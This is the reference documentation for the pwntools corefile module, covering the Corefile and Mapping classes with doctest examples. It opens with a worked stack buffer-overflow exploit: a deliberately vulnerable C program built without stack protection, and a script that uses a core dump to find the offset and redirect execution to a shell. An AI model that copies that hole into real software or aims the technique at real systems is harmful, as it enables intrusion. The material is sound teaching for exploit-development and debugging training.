`pwnlib.elf.corefile` — Core Files

Read information from Core Dumps.

Core dumps are extremely useful when writing exploits, even outside of the normal act of debugging things.

Using Corefiles to Automate Exploitation

For example, if you have a trivial buffer overflow and don’t want to open up a debugger or calculate offsets, you can use a generated core dump to extract the relevant information.

#include <string.h>
#include <stdlib.h>
#include <unistd.h>
void win() {
    system("sh");
}
int main(int argc, char** argv) {
    char buffer[64];
    strcpy(buffer, argv[1]);
}

$ gcc crash.c -m32 -o crash -fno-stack-protector

from pwn import *

# Generate a cyclic pattern so that we can auto-find the offset
payload = cyclic(128)

# Run the process once so that it crashes
process(['./crash', payload]).wait()

# Get the core dump
core = Coredump('./core')

# Our cyclic pattern should have been used as the crashing address
assert pack(core.eip) in payload

# Cool! Now let's just replace that value with the address of 'win'
crash = ELF('./crash')
payload = fit({
    cyclic_find(core.eip): crash.symbols.win
})

# Get a shell!
io = process(['./crash', payload])
io.sendline(b'id')
print(io.recvline())
# uid=1000(user) gid=1000(user) groups=1000(user)

Module Members

class pwnlib.elf.corefile.Corefile(*a, **kw)[source]

Bases: ELF

Enhances the information available about a corefile (which is an extension of the ELF format) by permitting extraction of information about the mapped data segments, and register state.

Registers can be accessed directly, e.g. via core_obj.eax and enumerated via Corefile.registers.

Memory can be accessed directly via pwnlib.elf.elf.ELF.read() or pwnlib.elf.elf.ELF.write(), and also via pwnlib.elf.elf.ELF.pack() or pwnlib.elf.elf.ELF.unpack() or even string().

Parameters:: core – Path to the core file. Alternately, may be a process instance, and the core file will be located automatically.

>>> c = Corefile('./core')
>>> hex(c.eax)
'0xfff5f2e0'
>>> c.registers
{'eax': 4294308576,
 'ebp': 1633771891,
 'ebx': 4151132160,
 'ecx': 4294311760,
 'edi': 0,
 'edx': 4294308700,
 'eflags': 66050,
 'eip': 1633771892,
 'esi': 0,
 'esp': 4294308656,
 'orig_eax': 4294967295,
 'xcs': 35,
 'xds': 43,
 'xes': 43,
 'xfs': 0,
 'xgs': 99,
 'xss': 43}

Mappings can be iterated in order via Corefile.mappings.

>>> Corefile('./core').mappings
[Mapping('/home/user/pwntools/crash', start=0x8048000, stop=0x8049000, size=0x1000, flags=0x5, page_offset=0x0),
 Mapping('/home/user/pwntools/crash', start=0x8049000, stop=0x804a000, size=0x1000, flags=0x4, page_offset=0x1),
 Mapping('/home/user/pwntools/crash', start=0x804a000, stop=0x804b000, size=0x1000, flags=0x6, page_offset=0x2),
 Mapping(None, start=0xf7528000, stop=0xf7529000, size=0x1000, flags=0x6, page_offset=0x0),
 Mapping('/lib/i386-linux-gnu/libc-2.19.so', start=0xf7529000, stop=0xf76d1000, size=0x1a8000, flags=0x5, page_offset=0x0),
 Mapping('/lib/i386-linux-gnu/libc-2.19.so', start=0xf76d1000, stop=0xf76d2000, size=0x1000, flags=0x0, page_offset=0x1a8),
 Mapping('/lib/i386-linux-gnu/libc-2.19.so', start=0xf76d2000, stop=0xf76d4000, size=0x2000, flags=0x4, page_offset=0x1a9),
 Mapping('/lib/i386-linux-gnu/libc-2.19.so', start=0xf76d4000, stop=0xf76d5000, size=0x1000, flags=0x6, page_offset=0x1aa),
 Mapping(None, start=0xf76d5000, stop=0xf76d8000, size=0x3000, flags=0x6, page_offset=0x0),
 Mapping(None, start=0xf76ef000, stop=0xf76f1000, size=0x2000, flags=0x6, page_offset=0x0),
 Mapping('[vdso]', start=0xf76f1000, stop=0xf76f2000, size=0x1000, flags=0x5, page_offset=0x0),
 Mapping('/lib/i386-linux-gnu/ld-2.19.so', start=0xf76f2000, stop=0xf7712000, size=0x20000, flags=0x5, page_offset=0x0),
 Mapping('/lib/i386-linux-gnu/ld-2.19.so', start=0xf7712000, stop=0xf7713000, size=0x1000, flags=0x4, page_offset=0x20),
 Mapping('/lib/i386-linux-gnu/ld-2.19.so', start=0xf7713000, stop=0xf7714000, size=0x1000, flags=0x6, page_offset=0x21),
 Mapping('[stack]', start=0xfff3e000, stop=0xfff61000, size=0x23000, flags=0x6, page_offset=0x0)]

Examples

Let’s build an example binary which should eat R0=0xdeadbeef and PC=0xcafebabe.

If we run the binary and then wait for it to exit, we can get its core file.

>>> context.clear(arch='arm')
>>> shellcode = shellcraft.mov('r0', 0xdeadbeef)
>>> shellcode += shellcraft.mov('r1', 0xcafebabe)
>>> shellcode += 'bx r1'
>>> address = 0x41410000
>>> elf = ELF.from_assembly(shellcode, vma=address)
>>> io = elf.process(env={'HELLO': 'WORLD'})
>>> io.poll(block=True)
-11

You can specify a full path a la Corefile('/path/to/core'), but you can also just access the process.corefile attribute.

There’s a lot of behind-the-scenes logic to locate the corefile for a given process, but it’s all handled transparently by Pwntools.

>>> core = io.corefile

The core file has a exe property, which is a Mapping object. Each mapping can be accessed with virtual addresses via subscript, or contents can be examined via the Mapping.data attribute.

>>> core.exe
Mapping('/.../step3', start=..., stop=..., size=0x1000, flags=0x..., page_offset=...)
>>> hex(core.exe.address)
'0x41410000'

The core file also has registers which can be accessed direclty. Pseudo-registers pc and sp are available on all architectures, to make writing architecture-agnostic code more simple. If this were an amd64 corefile, we could access e.g. core.rax.

>>> core.pc == 0xcafebabe
True
>>> core.r0 == 0xdeadbeef
True
>>> core.sp == core.r13
True

We may not always know which signal caused the core dump, or what address caused a segmentation fault. Instead of accessing registers directly, we can also extract this information from the core dump via fault_addr and signal.

On QEMU-generated core dumps, this information is unavailable, so we substitute the value of PC. In our example, that’s correct anyway.

>>> core.fault_addr == 0xcafebabe
True
>>> core.signal
11

Core files can also be generated from running processes. This requires GDB to be installed, and can only be done with native processes. Getting a “complete” corefile requires GDB 7.11 or better.

>>> elf = ELF(which('bash-static'))
>>> context.clear(binary=elf)
>>> env = dict(os.environ)
>>> env['HELLO'] = 'WORLD'
>>> io = process(elf.path, env=env)
>>> io.sendline(b'echo hello')
>>> io.recvline()
b'hello\n'

The process is still running, but accessing its process.corefile property automatically invokes GDB to attach and dump a corefile.

>>> core = io.corefile
>>> io.close()

The corefile can be inspected and read from, and even exposes various mappings

>>> core.exe
Mapping('.../bin/bash-static', start=..., stop=..., size=..., flags=..., page_offset=...)
>>> core.exe.data[0:4]
b'\x7fELF'

It also supports all of the features of ELF, so you can pwnlib.elf.elf.ELF.read() or pwnlib.elf.elf.ELF.write() or even the helpers like pwnlib.elf.elf.ELF.pack() or pwnlib.elf.elf.ELF.unpack().

Don’t forget to call ELF.save() to save the changes to disk.

>>> core.read(elf.address, 4)
b'\x7fELF'
>>> core.pack(core.sp, 0xdeadbeef)
>>> core.save()

Let’s re-load it as a new Corefile object and have a look!

>>> core2 = Corefile(core.path)
>>> hex(core2.unpack(core2.sp))
'0xdeadbeef'

Various other mappings are available by name, for the first segment of:

exe the executable
libc the loaded libc, if any
stack the stack mapping
vvar
vdso
vsyscall

On Linux, 32-bit Intel binaries should have a VDSO section via vdso. Since our ELF is statically linked, there is no libc which gets mapped.

>>> core.vdso.data[:4]
b'\x7fELF'
>>> core.libc

But if we dump a corefile from a dynamically-linked binary, the libc will be loaded.

>>> process('bash').corefile.libc
Mapping('.../libc...so...', start=0x..., stop=0x..., size=0x..., flags=..., page_offset=...)

The corefile also contains a stack property, which gives us direct access to the stack contents. On Linux, the very top of the stack should contain two pointer-widths of NULL bytes, preceded by the NULL- terminated path to the executable (as passed via the first arg to execve).

>>> core.stack
Mapping('[stack]', start=0x..., stop=0x..., size=0x..., flags=0x6, page_offset=0x0)

When creating a process, the kernel puts the absolute path of the binary and some padding bytes at the end of the stack. We can look at those by looking at core.stack.data.

>>> size = len('/bin/bash-static') + 8
>>> core.stack.data[-size:]
b'bin/bash-static\x00\x00\x00\x00\x00\x00\x00\x00\x00'

We can also directly access the environment variables and arguments, via argc, argv, and env.

>>> 'HELLO' in core.env
True
>>> core.string(core.env['HELLO'])
b'WORLD'
>>> core.getenv('HELLO')
b'WORLD'
>>> core.argc
1
>>> core.argv[0] in core.stack
True
>>> core.string(core.argv[0])
b'.../bin/bash-static'

Corefiles can also be pulled from remote machines via SSH!

>>> s = ssh(user='travis', host='example.pwnme', password='demopass')
>>> _ = s.set_working_directory()
>>> elf = ELF.from_assembly(shellcraft.trap())
>>> path = s.upload(elf.path)
>>> _ =s.chmod('+x', path)
>>> io = s.process(path)
>>> io.wait(1)
-1
>>> io.corefile.signal == signal.SIGTRAP
True

Make sure fault_addr synthesis works for amd64 on ret.

>>> context.clear(arch='amd64')
>>> elf = ELF.from_assembly('push 1234; ret')
>>> io = elf.process()
>>> io.wait(1)
>>> io.corefile.fault_addr
1234

Corefile.getenv() works correctly, even if the environment variable’s value contains embedded ‘=’. Corefile is able to find the stack, even if the stack pointer doesn’t point at the stack.

>>> elf = ELF.from_assembly(shellcraft.crash())
>>> io = elf.process(env={'FOO': 'BAR=BAZ'})
>>> io.wait(1)
>>> core = io.corefile
>>> core.getenv('FOO')
b'BAR=BAZ'
>>> core.sp == 0
True
>>> core.sp in core.stack
False

Corefile gracefully handles the stack being filled with garbage, including argc / argv / envp being overwritten.

>>> context.clear(arch='i386')
>>> assembly = '''
... LOOP:
...   mov dword ptr [esp], 0x41414141
...   pop eax
...   jmp LOOP
... '''
>>> elf = ELF.from_assembly(assembly)
>>> io = elf.process()
>>> io.wait(2)
>>> core = io.corefile
>>> core.argc, core.argv, core.env
(0, [], {})
>>> core.stack.data.endswith(b'AAAA')
True
>>> core.fault_addr == core.sp
True

__init__(*a, **kw)[source]

_populate_got()[source]

Loads the symbols for all relocations.

>>> libc = ELF(which('bash')).libc
>>> assert 'strchrnul' in libc.got
>>> assert 'memcpy' in libc.got
>>> assert libc.got.strchrnul != libc.got.memcpy

_populate_plt()[source]

Loads the PLT symbols

>>> path = pwnlib.data.elf.path
>>> for test in glob(os.path.join(path, 'test-*')):
...     test = ELF(test)
...     assert '__stack_chk_fail' in test.got, test
...     if test.arch != 'ppc':
...         assert '__stack_chk_fail' in test.plt, test

debug()[source]: Open the corefile under a debugger.

getenv(name) → int[source]

Read an environment variable off the stack, and return its contents.

Parameters:: name (str) – Name of the environment variable to read.
Returns:: str – The contents of the environment variable.

Example

>>> elf = ELF.from_assembly(shellcraft.trap())
>>> io = elf.process(env={'GREETING': 'Hello!'})
>>> io.wait(1)
>>> io.corefile.getenv('GREETING')
b'Hello!'

argc[source]

Number of arguments passed

Type:: int

argc_address[source]

Pointer to argc on the stack

Type:: int

argv[source]

List of addresses of arguments on the stack.

Type:: list

argv_address[source]

Pointer to argv on the stack

Type:: int

envp_address[source]

Pointer to envp on the stack

Type:: int

property exe[source]

First mapping for the executable file.

Type:: Mapping

property fault_addr[source]

Address which generated the fault, for the signals: SIGILL, SIGFPE, SIGSEGV, SIGBUS. This is only available in native core dumps created by the kernel. If the information is unavailable, this returns the address of the instruction pointer.

Example

>>> elf = ELF.from_assembly('mov eax, 0xdeadbeef; jmp eax', arch='i386')
>>> io = elf.process()
>>> io.wait(1)
>>> io.corefile.fault_addr == io.corefile.eax == 0xdeadbeef
True

Type:: int

property libc[source]

First mapping for libc.so

Type:: Mapping

mappings[source]

A list of Mapping objects for each loaded memory region

Type:: list

property maps[source]

A printable string which is similar to /proc/xx/maps.

>>> print(Corefile('./core').maps)
8048000-8049000 r-xp 1000 /home/user/pwntools/crash
8049000-804a000 r--p 1000 /home/user/pwntools/crash
804a000-804b000 rw-p 1000 /home/user/pwntools/crash
f7528000-f7529000 rw-p 1000 None
f7529000-f76d1000 r-xp 1a8000 /lib/i386-linux-gnu/libc-2.19.so
f76d1000-f76d2000 ---p 1000 /lib/i386-linux-gnu/libc-2.19.so
f76d2000-f76d4000 r--p 2000 /lib/i386-linux-gnu/libc-2.19.so
f76d4000-f76d5000 rw-p 1000 /lib/i386-linux-gnu/libc-2.19.so
f76d5000-f76d8000 rw-p 3000 None
f76ef000-f76f1000 rw-p 2000 None
f76f1000-f76f2000 r-xp 1000 [vdso]
f76f2000-f7712000 r-xp 20000 /lib/i386-linux-gnu/ld-2.19.so
f7712000-f7713000 r--p 1000 /lib/i386-linux-gnu/ld-2.19.so
f7713000-f7714000 rw-p 1000 /lib/i386-linux-gnu/ld-2.19.so
fff3e000-fff61000 rw-p 23000 [stack]

Type:: str

property pc[source]

The program counter for the Corefile

This is a cross-platform way to get e.g. core.eip, core.rip, etc.

Type:: int

property pid[source]

PID of the process which created the core dump.

Type:: int

property ppid[source]

Parent PID of the process which created the core dump.

Type:: int

prpsinfo[source]: The NT_PRPSINFO object

prstatus[source]: The NT_PRSTATUS object.

property registers[source]

All available registers in the coredump.

Example

>>> elf = ELF.from_assembly('mov eax, 0xdeadbeef;' + shellcraft.trap(), arch='i386')
>>> io = elf.process()
>>> io.wait(1)
>>> io.corefile.registers['eax'] == 0xdeadbeef
True

Type:: dict

siginfo[source]: The NT_SIGINFO object

property signal[source]

Signal which caused the core to be dumped.

Example

>>> elf = ELF.from_assembly(shellcraft.trap())
>>> io = elf.process()
>>> io.wait(1)
>>> io.corefile.signal == signal.SIGTRAP
True

>>> elf = ELF.from_assembly(shellcraft.crash())
>>> io = elf.process()
>>> io.wait(1)
>>> io.corefile.signal == signal.SIGSEGV
True

Type:: int

property sp[source]

The stack pointer for the Corefile

This is a cross-platform way to get e.g. core.esp, core.rsp, etc.

Type:: int

stack[source]

Environment variables read from the stack. Keys are the environment variable name, values are the memory address of the variable.

Use getenv() or string() to retrieve the textual value.

Note: If FOO=BAR is in the environment, self.env['FOO'] is the address of the string "BAR\".

property vdso[source]

Mapping for the vdso section

Type:: Mapping

property vsyscall[source]

Mapping for the vsyscall section

Type:: Mapping

property vvar[source]

Mapping for the vvar section

Type:: Mapping

class pwnlib.elf.corefile.Mapping(core, name, start, stop, flags, page_offset)[source]

Encapsulates information about a memory mapping in a Corefile.

__init__(core, name, start, stop, flags, page_offset)[source]

__repr__()[source]: Return repr(self).

__str__()[source]: Return str(self).

find(sub, start=None, end=None)[source]: Similar to str.find() but works on our address space

rfind(sub, start=None, end=None)[source]: Similar to str.rfind() but works on our address space

__weakref__[source]: list of weak references to the object

property address[source]

Alias for Mapping.start.

Type:: int

property data[source]

Memory of the mapping.

Type:: str

flags[source]

Mapping flags, using e.g. PROT_READ and so on.

Type:: int

name[source]

Name of the mapping, e.g. '/bin/bash' or '[vdso]'.

Type:: str

page_offset[source]

Offset in pages in the mapped file

Type:: int

property path[source]

Alias for Mapping.name

Type:: str

property permstr[source]

Human-readable memory permission string, e.g. r-xp.

Type:: str

size[source]

Size of the mapping, in bytes

Type:: int

start[source]

First mapped byte in the mapping

Type:: int

stop[source]

First byte after the end of hte mapping

Type:: int

pwnlib.elf.corefile — Core Files

Using Corefiles to Automate Exploitation

Module Members

`pwnlib.elf.corefile` — Core Files